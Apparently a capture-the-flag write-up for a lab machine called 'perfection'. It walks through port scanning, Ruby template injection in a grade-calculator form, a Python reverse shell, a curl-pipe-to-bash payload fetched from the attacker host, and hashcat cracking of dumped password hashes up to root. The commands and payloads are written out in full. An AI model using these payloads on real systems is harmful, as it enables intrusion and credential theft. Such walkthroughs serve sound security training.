TCP Scan

> TARGET=10.10.11.253 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMz41H9QQUPCXN7lJsU+fbjZ/vR4Ho/eacq8LnS89xLx4vsJvjUJCcZgMYAmhHLXIGKnVv16ipqPaDom5cK9tig=
|   256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open  http    syn-ack ttl 63 nginx
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 80

http://10.10.11.253/ Powered by WEBrick 1.7.0

• Found this exploit about a path traversal exploit: https://www.exploit-db.com/exploits/5215
• Tried the following:

> curl 'http://10.10.11.253/..\..\..\..\..\..\windows\system32\drivers\etc\hosts'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<HTML>
  <HEAD><TITLE>Bad Request</TITLE></HEAD>
  <BODY>
    <H1>Bad Request</H1>
    bad URI `/..\..\..\..\..\..\windows\system32\drivers\etc\hosts'.
    <HR>
    <ADDRESS>
     WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) at
     perfection:3000
    </ADDRESS>
  </BODY>
</HTML>

foothold

• There is a grade weight calculator at weight-grade-calc
• using the following input makes the output having an extra new line

curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a'

Your total grade is 3%<p>a
: 0%</p><p>b: 0%</p><p>c: 0%</p><p>d: 0%</p><p>e: 1%</p>

# try callback
> curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a<%25=system("curl 10.10.16.25")%25>'
received callback
> python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.253 - - [26/Mar/2024 10:29:16] "GET / HTTP/1.1" 200 -

• compose a shell script

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# kali, serve the script andd call
> curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a<%25=system("curl 10.10.16.25/shell.sh|bash")%25>'

• get flag

susan@perfection:~$ ls -la
ls -la
total 48
drwxr-x--- 7 susan susan 4096 Feb 26 09:41 .
drwxr-xr-x 3 root  root  4096 Oct 27 10:36 ..
lrwxrwxrwx 1 root  root     9 Feb 28  2023 .bash_history -> /dev/null
-rw-r--r-- 1 susan susan  220 Feb 27  2023 .bash_logout
-rw-r--r-- 1 susan susan 3771 Feb 27  2023 .bashrc
drwx------ 2 susan susan 4096 Oct 27 10:36 .cache
drwx------ 3 susan susan 4096 Mar 25 11:38 .gnupg
lrwxrwxrwx 1 root  root     9 Feb 28  2023 .lesshst -> /dev/null
drwxrwxr-x 3 susan susan 4096 Oct 27 10:36 .local
drwxr-xr-x 2 root  root  4096 Oct 27 10:36 Migration
-rw-r--r-- 1 susan susan  807 Feb 27  2023 .profile
lrwxrwxrwx 1 root  root     9 Feb 28  2023 .python_history -> /dev/null
drwxr-xr-x 4 root  susan 4096 Oct 27 10:36 ruby_app
lrwxrwxrwx 1 root  root     9 May 14  2023 .sqlite_history -> /dev/null
-rw-r--r-- 1 susan susan    0 Oct 27 06:41 .sudo_as_admin_successful
-rw-r----- 1 root  susan   33 Mar 25 03:21 user.txt
-rw-r--r-- 1 susan susan   39 Oct 17 12:26 .vimrc
susan@perfection:~$ cat user.txt
cat user.txt
6af9eb3396a11dfe827551b25a0cb520

pe

• found a db

susan@perfection:~/Migration$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Oct 27 10:36 .
drwxr-x--- 7 susan susan 4096 Feb 26 09:41 ..
-rw-r--r-- 1 root  root  8192 May 14  2023 pupilpath_credentials.db

• parse

strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

• the hash needs cracking

susan_nasus abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
tina_anit dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
harry_yrrah d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
david_divad ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
stephen_nehpets 154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

• upload linpeas

╔══════════╣ Mails (limit 50)
    39937      4 -rw-r-----   1 root     susan         625 May 14  2023 /var/mail/susan
    39937      4 -rw-r-----   1 root     susan         625 May 14  2023 /var/spool/mail/susan

susan@perfection:~$ cat /var/spool/mail/susan
cat /var/spool/mail/susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be convered into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful student

• crack

> hashcat -m 1400 -a 3 hashes.txt susan_nasus_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt tina_anit_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt harry_yrrah_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt david_divad_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt stephen_nehpets_?d?d?d?d?d?d?d?d?d

abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210 dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57:tina_anit_916066225 d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393:harry_yrrah_782072564 ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a:david_divad_274797280 154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8:stephen_nehpets_609653958

susan@perfection:~$ sudo cat /root/root.txt 5391c357c4c016d2c9a99b98a9822ef7

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack